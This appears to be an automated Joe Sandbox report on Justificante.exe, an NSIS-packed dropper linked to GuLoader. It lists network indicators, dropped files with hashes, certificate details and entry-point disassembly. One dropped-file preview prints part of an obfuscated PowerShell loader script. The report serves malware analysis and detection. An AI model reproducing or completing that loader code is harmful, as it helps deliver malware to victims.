      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp | false | | unknown
      https://contoso.com/Icon | powershell.exe, 00000002.00000002.2144649951.0000000005684000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://www.ftp.ftp://ftp.gopher. | Apathism.exe, 00000007.00000001.2139551109.0000000000649000.00000020.00000001.01000000.0000000A.sdmp | false | | unknown
      https://drive.usercontent.google.com/ | Apathism.exe, 00000007.00000003.2563435185.00000000066D8000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000002.2600695296.00000000066D9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
      https://apis.google.com | Apathism.exe, 00000007.00000003.2232712170.00000000066B5000.00000004.00000020.00020000.00000000.sdmp, Apathism.exe, 00000007.00000003.2232712170.00000000066A6000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      http://nsis.sf.net/NSIS_ErrorError | Justificante.exe, 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Justificante.exe, 00000000.00000000.1417744480.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Apathism.exe, 00000007.00000000.2138832756.000000000040A000.00000008.00000001.01000000.00000009.sdmp | false | URL Reputation: safe | unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2141259582.0000000004621000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2141259582.0000000004777000.00000004.00000800.00020000.00000000.sdmp | false | | unknown

      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
      142.250.184.238 | drive.google.com | United States | | 15169 | GOOGLEUS | false
      142.250.186.97 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1539381
                        Start date and time:2024-10-22 16:02:09 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 30s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Justificante.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@6/18@2/2
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 84
                        • Number of non-executed functions: 293
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 3892 because it is empty
                        • Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Justificante.exe
                        Time: 10:03:14; Type: API Interceptor; Description: 40x Sleep call for process: powershell.exe modified
                        Time: 10:05:04; Type: API Interceptor; Description: 3x Sleep call for process: Apathism.exe modified
                        Match: 37f463bf4616ecd445d4a1937da06e19
                        Associated Sample Name / URL: 6 654398.vbs; Detection: malicious; Threat Name: FormBook, GuLoader; Context: 142.250.186.97, 142.250.184.238
                        Associated Sample Name / URL: FACTURA-ALBARANES.vbs; Detection: malicious; Threat Name: GuLoader, Snake Keylogger; Context: 142.250.186.97, 142.250.184.238
                        Associated Sample Name / URL: Massageapparater.vbs; Detection: malicious; Threat Name: FormBook, GuLoader; Context: 142.250.186.97, 142.250.184.238
                        Associated Sample Name / URL: phc.exe; Detection: malicious; Threat Name: Unknown; Context: 142.250.186.97, 142.250.184.238
                        Associated Sample Name / URL: phc.exe; Detection: malicious; Threat Name: Unknown; Context: 142.250.186.97, 142.250.184.238
                        Associated Sample Name / URL: 001_215_EA2047939_202410210815.exe; Detection: malicious; Threat Name: GuLoader, Snake Keylogger; Context: 142.250.186.97, 142.250.184.238
                        Associated Sample Name / URL: Fignen234.exe; Detection: malicious; Threat Name: GuLoader; Context: 142.250.186.97, 142.250.184.238
                        Associated Sample Name / URL: Fignen234.exe; Detection: malicious; Threat Name: FormBook, GuLoader; Context: 142.250.186.97, 142.250.184.238
                        Associated Sample Name / URL: MEC20241022001.bat; Detection: malicious; Threat Name: Remcos, GuLoader; Context: 142.250.186.97, 142.250.184.238
                        Associated Sample Name / URL: zamowienie.exe; Detection: malicious; Threat Name: GuLoader; Context: 142.250.186.97, 142.250.184.238
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):14744
                        Entropy (8bit):4.992175361088568
                        Encrypted:false
                        SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                        MD5:A35685B2B980F4BD3C6FD278EA661412
                        SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                        SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                        SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:dropped
                        Size (bytes):777760
                        Entropy (8bit):7.723680980803217
                        Encrypted:false
                        SSDEEP:12288:RgeuCaz4Fr0BktHwDmKoNxlA8rQt9P9g1WyQ9OpERjsOwfJnuW8EnIu5OQ:Rgwa0FzwDzoO8LWyQ9ySjYfJu1cl
                        MD5:73FD5954CB5BE48EA11D738097FDDA5A
                        SHA1:6AAB0CB9DDB07D3C3386E6FF72C2F969339E31F7
                        SHA-256:27D88A843003BF67D0BF917DB5A57620810B08C76C91E18D00C3D89C7D459545
                        SHA-512:BAB35C114448DC2A6F6BBB374BC2B006A9C5E7DF2653F2A8A9A616AE3CE70B22E25311986AED72415E8D3F448D293A849FA4A557690D5B9748305D50E93E6C36
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 39%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....`.................f...*.......5............@.................................}.....@.............................................x...........0................................................................................................text...re.......f.................. ..`.rdata...............j..............@..@.data...x............~..............@....ndata...P...............................rsrc...x...........................@..@................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2581686
                        Entropy (8bit):2.1671868544258412
                        Encrypted:false
                        SSDEEP:6144:zcuO/BLmJ+oQnJRCc0q06WIBmTadgJjNf8YRPQiU3z5jc7iwrBxUVqakRr3l2BXU:zcu6l/nJRDRWIB7NzZs1BSkjkBX3+b
                        MD5:1FD09E00586533D7101744C7D4A77A8D
                        SHA1:B821E347415A4AABD126315B558111ABDC3D22E5
                        SHA-256:62A8BF9F4B478FC91C7076FFC09E9358E90927FCF73AA6A072FAB3D01F104DD6
                        SHA-512:27E24F23B6206ECA1456271BC761813B9EBFB99C78173556FDEED1CA31B336BECA52BB526B1160116EDEBCF7C98256663E60B5B200502F61FB49465FE777BE12
                        Malicious:false
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):442181
                        Entropy (8bit):1.2617782727671476
                        Encrypted:false
                        SSDEEP:1536:SPxZsv+aBrcJ8vc7p6PE2de6DypPQKuO4du0+:g+PYtOOpPQrk
                        MD5:B6132BC7470969ED73701D454E5D4494
                        SHA1:174B74CD04726AF2549697685D1C738105405717
                        SHA-256:341DDDFDC91CFEE857A23B24E52F3E7DE1DE9346B3C1276E77431A7B740B962A
                        SHA-512:E130B771718A0B1CF7701812E3F2EE0A9C3FA164111C306B6F9412CF2C67D8E92C8E6BF6F359A379A8390018E10D317B78A779C9C29CCCD77E285874B64682FA
                        Malicious:false
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:ASCII text, with very long lines (2987), with CRLF, LF line terminators
                        Category:dropped
                        Size (bytes):52318
                        Entropy (8bit):5.322326963365616
                        Encrypted:false
                        SSDEEP:1536:6jQKMnINZTb11GdIEsKP0I/6KLwa++r4qQJ+Xlul4BU:hKMIXTpg2WLG+rvl4
                        MD5:57B432B0C43C8C1986125E2BF1ADC44F
                        SHA1:CA317042F46D3D8050CEAA3810481BFFAE830CF7
                        SHA-256:7856E5963B5C004408DE99F050232CAB859FCA1A7637FA1D2AE645D65B6451FA
                        SHA-512:D81E8A85DD3002EB0A38F5B769CF9EF8A71FA8FE213EB76438C2147A80BC2B430840BF12800054EFB5A9A7C267987C3349F53E9C282D408ADB4B1C7885A51084
                        Malicious:true
                        Preview:$Uddelegeringerne=$Bindingsvrksbygningdmirations;..<#Tabuerings Stentorstemmen Selvbyggeris Vandlbsforureningers #>..<#Diatomite Reformationer liturgistic Germaniseret Tondi Rattlers Styringsegnede #>..<#Statussymbolernes Studiesteds Bushwhackers biofag Weewow Befetished Vrage #>..<#regressionsanalysers Sedlernes Icelandic #>..<#Forkasteligt Fluorogenic Unraveling Forrettigheders tussehs #>..<#Baadejere Barbermaskiner uncontrolled Rubricose Interessentskabsaftalerne #>...$Hoatching = @'.Straa.Lust,$FraviTS,livrCoxaloK stnpChebui udsesSadhamInflae Antir Mulis Prime,omosg K.len Co,siRepelnKoncegLu tre SulkrActinsknif = Dece$ S oeBExproiUdtvrnTuartd PrveiPreagnCosheg .osksVerniv EdbrrFi,vakforlisB oadb Skr.y Svmmgnordkn kattiTrivin.dermgHorolnElicitunliqiSu.rimDetaia ,eflsDagsroLeptonIn fa;Denja. nonsfAandeu.nwarnT,ericAlin,tFortniNnne.oTekstnBevid Vr,esDInc ieGus.if rakieSkrpecLimbitEssenoF tinr.inde Stipp( Zucc$U locBd ssciOlivinSup,rdSunroiLedabnDe.leg MultsKulklv Partr Po hk.okats,rer
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):404960
                        Entropy (8bit):1.2539637209765142
                        Encrypted:false
                        SSDEEP:768:PpaN0L27G+adCA0On7ixPzwv9b6iWddF+xsjd9ri4zWdx4e5yO7lqXfcCac+wsEt:1xCaSjdFWOzjXODGTPOxDdKxX4UGs
                        MD5:70ED615036BBA1FE3CD94B9E1DD9B532
                        SHA1:284DF5F97DD305620807EC5CB2B9911619BD38E6
                        SHA-256:7584DBB9B36AB8273CB8B55F2F1F01952FB5C63ECD111C0D829403192B86271F
                        SHA-512:E761B8C76D93AA067BD102FF5D6B335E62ED340436020757BF863D67995029C434CF917B239632F1B24F765755E99574D32AB194960074D75418AFF31C14144F
                        Malicious:false
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):232819
                        Entropy (8bit):1.2428101350516447
                        Encrypted:false
                        SSDEEP:768:8NDieXWfKpcq+Q2mPGSchs7CiiWZcare7evVHZ2mX+hss8RSHwN0gDVoWwSMcP0q:0XfxFimsX2ZTn2rIaSd1+
                        MD5:7459BF293DD14A6F7225192B0B4B96C7
                        SHA1:2BEE6095E83ED4F6C80F11677CCFE6833EC0F6AA
                        SHA-256:23928DF448B222A8DA56CF9204175F8792BA660B9B3AF4A7FCEDC8D8740C3D7C
                        SHA-512:7D8E3E3A18A3DB75C13DD0D867EB25290C9D85221203B119D1CF25330BE26B201102E3D4D49DDE721D11692C8EDAD9A92771438361ACBA9900C43E6D9436EAF7
                        Malicious:false
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):354994
                        Entropy (8bit):1.2540722835285425
                        Encrypted:false
                        SSDEEP:768:8/AKcI0EdmvV1QkviXQ/9TdZDGeoeq0gc42AnEjPQWdEpavLRmkbGPMJQ/GQaBc8:lLmC+Uhy2Jj8fexlj2jApfTRjao
                        MD5:E3AD5C4AA0CFA157C13B879ACD182924
                        SHA1:5AB8F173A5EFE311420E4988CCD21001C93FD44B
                        SHA-256:A28BFF6B6CF4B3ECE930779F7ECBF251437F12B9D5962B417F9865AD17636400
                        SHA-512:759C85ACA9DFB267679BFD808C1790347B92F84DE9E863553E1E7B3AFC4635EADE1DCC1E3EAF395BF684C3EC50ED4C32614A3BEFCC1DAB0E452311BD405E45C5
                        Malicious:false
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):260786
                        Entropy (8bit):1.2489055466142445
                        Encrypted:false
                        SSDEEP:768:rKqDadwuWgiY4EIxjcWHXlxWRaiUabM1LeErmqUwpCzfTw8KtNfiE10z0WZ8J0Sk:9YMiW3lYRnU1bDsGpYCJ6GsK3bq
                        MD5:F5FC181F5F8AADAF42270FDD65EF84A2
                        SHA1:B52CDE1731D7F6307B8279DF32272D4BDB339491
                        SHA-256:7C793AAAAD5EB0D30AE4813E38EC3C6F6C79D000538729637D92042532BA5136
                        SHA-512:A924A619620DD0C00307AB48E771E15DE96E42AF39AE7358F953955D0E6F8E55033CE6CE4BEE0E7780727C12CC76FE1B72E832FC5FCC62C7F2D483E75DEF31E3
                        Malicious:false
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):378313
                        Entropy (8bit):1.254818848790239
                        Encrypted:false
                        SSDEEP:768:dZ7RXG+/V5YcLeoYXekIdTt5ZBgFafl7e1UreZ4rP6hzE8japmIr1peXw9ZjUtjd:lMXq1XaCvwsRYXtDQSFMwl3kudbldx1
                        MD5:85D059495DD7A45590D6A55B34EE7F31
                        SHA1:3D177034FA0D6C9508ADC61C22CC42448ABA2841
                        SHA-256:0FFE13C01F55C13132FA0EF378F5456709892C090BECEAAEF0914D994D3D9C46
                        SHA-512:22AE223550D92B0BF6C387FA07FBC2C03C5DB4E1EF59C4086F00D3CF265C004FAC7C7C7F1EB8D04E90784BE5868017FC25843C981636B60DADABFE26A62C7908
                        Malicious:false
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:DIY-Thermocam raw data (Lepton 2.x), scale 116-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 128.000000
                        Category:dropped
                        Size (bytes):235060
                        Entropy (8bit):1.2512601304375985
                        Encrypted:false
                        SSDEEP:768:bx1OLvd9+Np6116yx38wt9zQVBsuR/1samMQmIihfM0puah7KhD2KaW0qkY9nPCQ:FcvdUBL/1v7uaWFEt
                        MD5:5E2A2C05A81F24EE4D0B050E67FAE817
                        SHA1:0122F59156F4FE2FEC4CD89C52411120AAE457E6
                        SHA-256:D3CDB75BF7AAF59F718FACAF16B37FDCE2CF44F65001B17CD828303282F5ADF2
                        SHA-512:A6208AA83B30E90A238E828C2BD338B70C7D88CE13B0B02EE6A39476CA8B84AEAD96CC567F9875AD817E29516AA708928E287E90E23F005F3166AD65BDDE106F
                        Malicious:false
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):505
                        Entropy (8bit):4.247549717294304
                        Encrypted:false
                        SSDEEP:12:DGWhS9pbf55GAWvp68PLaxD9WKgNUFt2nQ2:Dk9pFyxJPLaPWrQ2
                        MD5:04A01644A733FB7ED73FFCC807AA508F
                        SHA1:CA03E907E76754B0FB66E06A8150A37E45042C52
                        SHA-256:258803F87B8DF112F73C5D0E5075D348C0119B53691CEF3436DF6FD70F461B7A
                        SHA-512:5DEBD35DC37BD1F339CFC51245E849DF81A7664B781B4A1BA03C0439D8C0AF7042CD4984506E8671198E640384B533F0090C9E282B879142F4536CF6D996FDB3
                        Malicious:false
                        Preview:spillebulernes hatracks strmafbrydelsernes nonglare elektroingenirernes questioners logerende,nevermass hoblike classiest forlbnes heteroerotic gastrocatarrhal paridigitate..arbejdsvogn detectivism ferries kamsin apanteles heliconian scyphistomoid manicurists ugedagen kateten chikaners rakitissen feudalistiskes..incomposedness langblges cardiocirrhosis smalfilmet,opgrelsesdatoen kliddet salamanderlike eza komedianters shipwrights,kalmusrod exomphalus subalternation ubnhrligeres kursussteder isodiazo.
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):201364
                        Entropy (8bit):7.762239752762983
                        Encrypted:false
                        SSDEEP:3072:ttMVuOkQzBpRj3gwmEiXQF4L+oE+qpQOJR3ScGI6q/dCLucEey9Bi:fcuO/BLmJ+oQnJRCc0q06WIBi
                        MD5:E6C88AD587F8E2B7F6B8BC1EAA9E1A96
                        SHA1:A475C06AECC87B897035AC63E79B53AE164FFAB1
                        SHA-256:D42703E8DEF312E5EEB03D5A1CF458C06D77CF436D0E57853FF046E047F768FC
                        SHA-512:05CFFAB197B599FB333A428F2318926542E17D63DB6C574AC15337AF5CB2EE042C54CC6061C6F3DA03A221DB712C0495BCC55B9C84F83724BB68F759D5B13162
                        Malicious:false
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.723680980803217
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Justificante.exe
                        File size:777'760 bytes
                        MD5:73fd5954cb5be48ea11d738097fdda5a
                        SHA1:6aab0cb9ddb07d3c3386e6ff72c2f969339e31f7
                        SHA256:27d88a843003bf67d0bf917db5a57620810b08c76c91e18d00c3d89c7d459545
                        SHA512:bab35c114448dc2a6f6bbb374bc2b006a9c5e7df2653f2a8a9a616ae3ce70b22e25311986aed72415e8d3f448d293a849fa4a557690d5b9748305d50e93e6c36
                        SSDEEP:12288:RgeuCaz4Fr0BktHwDmKoNxlA8rQt9P9g1WyQ9OpERjsOwfJnuW8EnIu5OQ:Rgwa0FzwDzoO8LWyQ9ySjYfJu1cl
                        TLSH:29F40110E4D18451EDCA7A708B55FB8E4A62BFE3747084862F71BE03BAF4742B946CE5
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......`.................f...*.....
                        Icon Hash:0d1c58da92c4e273
                        Entrypoint:0x4035d8
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x60FC91EE [Sat Jul 24 22:19:26 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:c05041e01f84e1ccca9c4451f3b6a383
                        Signature Valid:false
                        Signature Issuer:CN=Stokkene, O=Stokkene, L=Bruges, C=FR
                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                        Error Number:-2146762487
                        Not Before, Not After
                        • 14/02/2024 00:55:13 13/02/2027 00:55:13
                        Subject Chain
                        • CN=Stokkene, O=Stokkene, L=Bruges, C=FR
                        Version:3
                        Thumbprint MD5:9867912BE4CBE23A505FBDF93200382E
                        Thumbprint SHA-1:10606E724AD8E5EA0486BAB0087A6709CB74B820
                        Thumbprint SHA-256:7A7A448CC99A17C49600388F7A07EB4C6F45F411FC523897E8BCFB4DA274B1A7
                        Serial:07928DD17D93924B33654087DA6A1A0CD5572531
                        Instruction
                        sub esp, 000002D4h
                        push ebx
                        push esi
                        push edi
                        push 00000020h
                        pop edi
                        xor ebx, ebx
                        push 00008001h
                        mov dword ptr [esp+14h], ebx
                        mov dword ptr [esp+10h], 0040A230h
                        mov dword ptr [esp+1Ch], ebx
                        call dword ptr [004080C8h]
                        call dword ptr [004080CCh]
                        and eax, BFFFFFFFh
                        cmp ax, 00000006h
                        mov dword ptr [0042A26Ch], eax
                        je 00007F13009200E3h
                        push ebx
                        call 00007F13009233E9h
                        cmp eax, ebx
                        je 00007F13009200D9h
                        push 00000C00h
                        call eax
                        mov esi, 004082B0h
                        push esi
                        call 00007F1300923363h
                        push esi
                        call dword ptr [00408154h]
                        lea esi, dword ptr [esi+eax+01h]
                        cmp byte ptr [esi], 00000000h
                        jne 00007F13009200BCh
                        push 0000000Bh
                        call 00007F13009233BCh
                        push 00000009h
                        call 00007F13009233B5h
                        push 00000007h
                        mov dword ptr [0042A264h], eax
                        call 00007F13009233A9h
                        cmp eax, ebx
                        je 00007F13009200E1h
                        push 0000001Eh
                        call eax
                        test eax, eax
                        je 00007F13009200D9h
                        or byte ptr [0042A26Fh], 00000040h
                        push ebp
                        call dword ptr [00408038h]
                        push ebx
                        call dword ptr [00408298h]
                        mov dword ptr [0042A338h], eax
                        push ebx
                        lea eax, dword ptr [esp+34h]
                        push 000002B4h
                        push eax
                        push ebx
                        push 00421708h
                        call dword ptr [0040818Ch]
                        push 0040A384h
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x1c778 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0xbd530 | 0x8f0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0x6572 | 0x6600 | 869e1d11bbf88d92521c022fa6f3d4f0 | False | 0.6623008578431373 | data | 6.453919385955138 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata | 0x8000 | 0x1398 | 0x1400 | 79e286249499b713a2ddbee33baa50da | False | 0.449609375 | data | 5.1367175827370986 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data | 0xa000 | 0x20378 | 0x600 | b6d02c867f7bfbcf68de2cfeea94fd73 | False | 0.5078125 | data | 4.096809083627214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
